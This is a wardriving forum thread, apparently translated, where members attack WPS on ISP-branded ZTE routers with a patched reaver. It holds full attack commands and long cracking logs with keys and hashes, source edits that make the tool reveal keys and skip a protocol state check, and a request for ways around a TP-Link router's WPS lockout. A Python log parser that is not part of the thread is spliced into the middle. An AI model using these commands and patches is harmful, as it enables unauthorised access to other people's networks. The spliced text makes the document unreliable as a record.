Vulnerability in the Wi-Fi Protected Setup protocol

Discussion in 'Wireless technologies/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. startless (Member)
    Yesterday I finally compiled it with the empty-PIN patch. Tested it on a ZTE 118. Didn't work.
    Today I'll try the build from the ticket...
     
  2. leonid2012lnv (Member)
    So it probably won't work on a ZTE 108 either; I've been hammering at one for about 2 months, no luck. I'm still inexperienced with Linux, which is why this topic got my interest, but I can't manage to compile it myself; before, I always followed step-by-step instructions. Meanwhile there are more and more of these access points around here. The new ones are either ZTE 108s or D-Links with WPS switched off; I didn't see that before... Not one of the 3 handshakes has given in. Sad, though.
     
  3. binarymaster (Elder)
    Purely as an experiment, test both variants: with the -S (--dh-small) option and without it.

    I noticed in the latest version of reaver that some access points stopped cracking with the -S option and send a so-called "FAKE nack". I haven't yet figured out whether it's a bug in reaver or something in the APs themselves.
     
  4. startless (Member)
    Yes, I'll test with different options. I've already built reaver from your ticket; I'll be testing in the evening.
    The AP behaves strangely. If you don't push it along with aireplay, progress is veeery slow.
    And then, without the -N option it's nothing but timeouts.
    But if connecting is only possible via the button, the whole idea is a waste of time. airodump shows PBC almost immediately.
    On github there was a suggestion that the pin has to be given directly via -p and the -n option added as well. I'll try different combinations.
    It would also be nice to reboot the AP, but I don't know how yet. Can anyone suggest something? ZTE ZXHN H118N (D4:76:EA: ...)
     
  5. leonid2012lnv (Member)
    And what's the probability that the pin is the default one? 12345670? I've tried this and that, with different options and with generated pins. There's a bit here that I found, but my English is poor and Google is a so-so translator: https://www.wifi-libre.com/topic-462-pin-por-defecto-zte-zhxn-h108n-jazztelxxxx-no-sirve.html
     
    #3965 leonid2012lnv, 29 Mar 2017
    Last edited: 29 Mar 2017
  6. binarymaster (Elder)
    By the way, it's precisely such APs in PBC mode that should, in theory, be vulnerable to the empty string.

    I think that is the case kcdtv mentioned in the ticket.
     
  7. VasiliyP (Well-Known Member)
    Show the piece of the log with the information for pixiewps. If the M3 packets arrive at all, of course.
     
  8. binarymaster (Elder)
    Here's the thing... it looks like there's a bug in reaver. :oops:

    https://github.com/t6x/reaver-wps-fork-t6x/pull/133#issuecomment-290057448
     
  9. startless (Member)
    Tried the newly patched reaver. The empty WPS pin method seems to work, but it doesn't give out the password.

    root@kali:~# ./reaver -i wlan0mon -b D4:76:EA:хх:хх:хх -c 6 -v -N -B "" -vvv

    Reaver v1.5.3 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft

    [+] Switching wlan0mon to channel 6
    [?] Restore previous session for D4:76:EA:хх:хх:хх? [n/Y] n
    [+] Waiting for beacon from D4:76:EA:хх:хх:хх
    [+] Associated with D4:76:EA:хх:хх:хх (ESSID: ROSTELECOM-хх)
    [+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
    [+] Trying pin ""
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 8 seconds
    [+] WPS PIN: ''
    [+] Nothing done, nothing to save.
     
  10. binarymaster (Elder)
    Suspiciously frequent packet repeats, or just duplicated lines. o_O

    I'll need to test that.
     
  11. startless (Member)
    These routers always react like that.
    Let's say the WPS pin is "". How do I now pass it in the -p option? Presumably the code validates the input?
     
  12. startless (Member)
    Result with the -n option added

    root@kali:~# ./reaver -i wlan0mon -b D4:76:EA:xx:xx:xx -c 6 -vvv -n -B "" -N

    Reaver v1.5.3 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft

    [+] Switching wlan0mon to channel 6
    [?] Restore previous session for D4:76:EA:xx:xx:xx? [n/Y] n
    [+] Waiting for beacon from D4:76:EA:xx:xx:xx
    [+] Associated with D4:76:EA:xx:xx:xx (ESSID: ROSTELECOM-xx)
    [+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
    [+] Trying pin ""
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 31:29:f7:42:16:02:e0:89:59:43:88:22:27:a7:c0:41
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: ZTE Corporation
    [P] WPS Model Name: ZXHN H118N
    [P] WPS Model Number: ZXHN H118N
    [P] Access Point Serial Number: 123456789012347
    [+] Received M1 message
    [P] R-Nonce: 4f:b7:04:df:cf:95:85:25:20:f4:de:ef:d7:dc:f3:b6
    [P] PKR: e6:d6:74:ba:c7:d1:df:b1:8b:71:49:c7:2a:6c:c1:21:22:fd:d9:2b:0a:b4:2a:07:87:dc:16:87:6c:be:61:9b:0b:7f:34:58:9f:8d:83:9a:74:d2:f2:f1:5e:b5:d2:10:72:1e:2f:b1:95:2c:c5:d8:ec:69:cd:ce:d0:5d:a7:31:64:9b:88:3e:4c:1d:6d:71:d9:94:a2:bc:3f:38:79:30:34:f5:c9:fa:0b:64:f9:e6:e6:4d:e0:f2:f5:71:35:4f:4d:06:aa:bc:8e:58:bd:96:bf:30:97:f6:4c:48:00:d0:96:59:19:79:cc:32:42:fa:a0:02:61:4a:eb:0e:a8:3c:cf:f8:67:8d:99:4e:cd:dd:44:6e:3f:bc:bb:00:f6:84:5f:78:e4:a6:ab:f3:50:fd:c5:80:4e:57:3c:e3:1f:00:f5:98:ea:ca:8a:6f:c4:67:a4:56:27:e7:fe:62:4c:b6:43:a6:7d:f3:c8:97:85:78:32:4c:8e:04:62:15:7a:56
    [P] AuthKey: d8:49:64:3a:d3:51:c4:6f:d8:33:2e:cd:bf:2e:43:e1:f2:e2:00:4f:1d:d2:fc:92:00:6b:bf:6e:49:c1:34:c0
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin ""
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 23:16:b1:57:61:d7:ba:b9:6e:6f:ae:ae:2d:f8:3a:d0
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: ZTE Corporation
    [P] WPS Model Name: ZXHN H118N
    [P] WPS Model Number: ZXHN H118N
    [P] Access Point Serial Number: 123456789012347
    [+] Received M1 message
    [P] R-Nonce: de:04:09:0d:3b:fb:26:6a:8e:2c:e0:65:3b:f5:b5:20
    [P] PKR: 83:d0:81:ea:9b:f1:b7:bc:bf:e3:8f:a8:40:bc:7e:94:55:7e:06:f0:11:2a:ec:5c:1a:e9:42:0e:7e:48:e5:ed:4e:05:1e:0c:2c:38:40:2e:9a:8a:8d:81:92:29:5d:6b:56:48:26:5d:13:d1:72:fa:b5:9c:ef:ae:ca:3a:00:d6:ee:ee:cc:28:90:b9:fa:24:ea:87:e4:0c:f5:a6:14:f5:3c:b7:e8:d2:b7:1b:34:42:1b:6f:ef:e5:3a:19:9d:ee:7f:96:17:dd:85:ae:ab:31:b6:79:45:d5:bf:e3:ef:e2:8e:ee:8b:44:8c:99:bf:62:66:0c:8e:90:30:b1:a1:c2:b1:2d:d2:4c:a9:7b:d1:9b:fa:2b:75:23:6a:c6:8c:c5:13:ea:7b:d5:b0:7f:b8:7b:74:95:b9:df:f0:20:7d:7e:40:ef:bc:f0:23:3b:d5:e9:4c:e3:ab:1b:11:e0:ea:e7:75:46:2f:9c:f9:a8:32:49:52:2b:59:60:3b:3b:95:ca
    [P] AuthKey: 4d:33:97:04:b7:e5:22:5f:0a:cb:a6:94:37:22:42:8a:ce:48:be:dd:27:ee:37:3e:2f:50:a5:22:e4:a4:c3:bd
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [P] E-Hash1: a8:ea:2e:06:19:b8:a5:e7:b5:a9:47:8a:2e:ed:5e:20:27:77:38:05:af:23:27:75:74:c8:36:e6:ce:11:a5:d4
    [P] E-Hash2: a8:ea:2e:06:19:b8:a5:e7:b5:a9:47:8a:2e:ed:5e:20:27:77:38:05:af:23:27:75:74:c8:36:e6:ce:11:a5:d4
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 29 seconds
    [+] WPS PIN: ''
    [+] Nothing done, nothing to save.
     
  13. binarymaster (Elder)
    I've just updated the pull request there, since rofl0r suggested merging the new option with the old -p.

    For -p there is (was) input validation; now, after the new patch, it uses the string.
     
  14. VasiliyP (Well-Known Member)
    The pin there is definitely empty; as for why it doesn't show the key, you need to enable more detailed logging: in the file wpa_debug.c
    int wpa_debug_level = MSG_INFO;
    int wpa_debug_show_keys = 0;
    change to
    int wpa_debug_level = 0;
    int wpa_debug_show_keys = 1;

    Upd: It looks like when E-Hash1==E-Hash2, the first thing to check should be an empty pin
     
    #3974 VasiliyP, 29 Mar 2017
    Last edited: 29 Mar 2017
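    An added example, not code from the thread or from reaver: a small Python parser for the reaver -vvv output quoted above. It collects the [P] fields, flags the E-Hash1 == E-Hash2 condition VasiliyP points out, and counts the repeated "Received Mx" lines binarymaster asks about. The sample log is constructed; its PKE/PKR values are dummies.

```python
import re
from collections import Counter

# Constructed excerpt in the shape of the reaver -vvv output quoted above.
# PKE/PKR are dummy values; the E-Hash lines reuse the identical pair seen
# in the second log of this thread.
SAMPLE_LOG = """\
[+] Trying pin ""
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 23:16:b1:57:61:d7:ba:b9:6e:6f:ae:ae:2d:f8:3a:d0
[P] PKE: 01:02:03:04
[P] WPS Manufacturer: ZTE Corporation
[+] Received M1 message
[P] R-Nonce: de:04:09:0d:3b:fb:26:6a:8e:2c:e0:65:3b:f5:b5:20
[P] PKR: 05:06:07:08
[P] AuthKey: 4d:33:97:04:b7:e5:22:5f:0a:cb:a6:94:37:22:42:8a:ce:48:be:dd:27:ee:37:3e:2f:50:a5:22:e4:a4:c3:bd
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[P] E-Hash1: a8:ea:2e:06:19:b8:a5:e7:b5:a9:47:8a:2e:ed:5e:20:27:77:38:05:af:23:27:75:74:c8:36:e6:ce:11:a5:d4
[P] E-Hash2: a8:ea:2e:06:19:b8:a5:e7:b5:a9:47:8a:2e:ed:5e:20:27:77:38:05:af:23:27:75:74:c8:36:e6:ce:11:a5:d4
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M7 message
[+] Sending WSC NACK
[+] WPS PIN: ''
"""

# The [P] fields reaver prints for pixiewps (R-Nonce kept for completeness).
PIXIE_FIELDS = ("E-Nonce", "R-Nonce", "PKE", "PKR", "AuthKey", "E-Hash1", "E-Hash2")
LINE_RE = re.compile(r"^\[(?P<tag>[+!?P])\] (?P<body>.*)$")
FIELD_RE = re.compile(r"^(?P<name>[A-Za-z0-9-]+): (?P<hex>[0-9a-fA-F]{2}(?::[0-9a-fA-F]{2})*)$")
RECV_RE = re.compile(r"^Received (M[1-8]) message$")


def parse_reaver_log(text):
    """Return (pixie fields as plain hex strings, Counter of 'Received Mx' lines)."""
    fields, received = {}, Counter()
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # banner and wpa_supplicant "WPS: ..." debug lines are skipped
        tag, body = m.group("tag"), m.group("body")
        if tag == "P":
            f = FIELD_RE.match(body)
            if f and f.group("name") in PIXIE_FIELDS:
                fields[f.group("name")] = f.group("hex").replace(":", "").lower()
        else:
            r = RECV_RE.match(body)
            if r:
                received[r.group(1)] += 1
    return fields, received


def analyse(text):
    """Summarise one reaver session the way the thread reads the logs by hand."""
    fields, received = parse_reaver_log(text)
    missing = [k for k in PIXIE_FIELDS if k not in fields]
    # E-Hash1 = HMAC(AuthKey, E-S1 | PSK1 | PKE | PKR), E-Hash2 likewise with
    # E-S2 | PSK2, where PSK1/PSK2 derive from the two PIN halves. Identical
    # hashes mean the enrollee reused its secret nonce and both halves give the
    # same PSK, which an empty PIN (both halves "") does; hence "check the
    # empty pin first".
    ehash_equal = "E-Hash1" in fields and fields["E-Hash1"] == fields.get("E-Hash2")
    # Each Mx is normally logged once per transaction; a higher count is either
    # AP retransmission or duplicated logging, which is the open question above.
    duplicates = {k: n for k, n in received.items() if n > 1}
    return {"missing_pixie_fields": missing, "ehash_equal": ehash_equal,
            "duplicate_received": duplicates}
```

    Run it over a saved reaver session file to see at a glance whether the session produced the complete set of [P] fields and whether the hash pair coincides.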
  15. startless (Member)
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin "�p��p�"
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    Ошибка сегментирования
     
  16. binarymaster (Elder)
    Apparently, where the string is obtained from get_static_p1(), a duplicate of it needs to be made, i.e. wrap it in strdup().
    Interesting observation!
     
  17. startless (Member)
    root@kali:~/reaver/src# ./reaver -i wlan0mon -b D4:76:EA:xx:xx:xx -c 6 -vvv -p "" -N

    Reaver v1.5.3 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft

    [+] Switching wlan0mon to channel 6
    [+] Waiting for beacon from D4:76:EA:xx:xx:xx
    [+] Associated with D4:76:EA:xx:xx:xx (ESSID: ROSTELECOM-xx)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    WPS: A new PIN configured (timeout=0)
    WPS: UUID - hexdump(len=16): [NULL]
    WPS: PIN - hexdump_ascii(len=0):
    WPS: Selected registrar information changed
    WPS: Internal Registrar selected (pbc=0)
    WPS: sel_reg_union
    WPS: set_ie
    WPS: cb_set_sel_reg
    WPS: Enter wps_cg_set_sel_reg
    WPS: Leave wps_cg_set_sel_reg early
    WPS: return from wps_selected_registrar_changed
    [+] Trying pin ""
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    WPS: Processing received message (len=539 op_code=4)
    WPS: Received WSC_MSG
    WPS: attr type=0x104a len=1

    .................................

    [+] Received M5 message
    WPS: Processing received message (len=158 op_code=4)
    WPS: Received WSC_MSG
    WPS: attr type=0x104a len=1
    WPS: attr type=0x1022 len=1
    WPS: attr type=0x1039 len=16
    WPS: attr type=0x1018 len=112
    WPS: attr type=0x1005 len=8
    WPS: Parsed WSC_MSG
    WPS: Received M7
    WPS: Unexpected state (12) for receiving M7
    WPS: WPS_CONTINUE, Freeing Last Message
    WPS: WPS_CONTINUE, Saving Last Message
    WPS: returning
    [+] Received M7 message
    WPS: Building Message WSC_NACK
    WPS: * Version
    WPS: * Message Type (14)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * Configuration Error (0)
    [+] Sending WSC NACK
    WPS: Building Message WSC_NACK
    WPS: * Version
    WPS: * Message Type (14)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * Configuration Error (0)
    [+] Sending WSC NACK
    [+] Pin cracked in 15 seconds
    [+] WPS PIN: ''
    [+] Nothing done, nothing to save.
    WPS: Full PIN information revealed and negotiation failed
    WPS: Invalidated PIN for UUID - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 41 44 53 4c 20 4d

    Applied the latest changes and rebuilt. It doesn't give up the password.
     
  18. VasiliyP (Well-Known Member)
    Try replacing, in the file wps_registrar.c, the line
    if (wps->state != RECV_M7) {
    with
    if (0) {
    Maybe it'll help. The constant repeats of received packets could also be related to the adapter.
     
  19. startless (Member)
    Tried it. No change.
     
  20. Elusive (New Member)
    I've read the thread and have a question: is there a way around the WPS lock on a TP-Link (C0:4A:00)?
    With ordinary brute-forcing you get
    Code:
    warning: detected ap rate limiting, waiting 60 seconds before re-checking
    I tried mdk3, it says
    Code:
    mdk3 device seems to be invulnerable
    If I increase the time between attempts or something else, will that do any good?

    wifislax 4.12. (722n)
     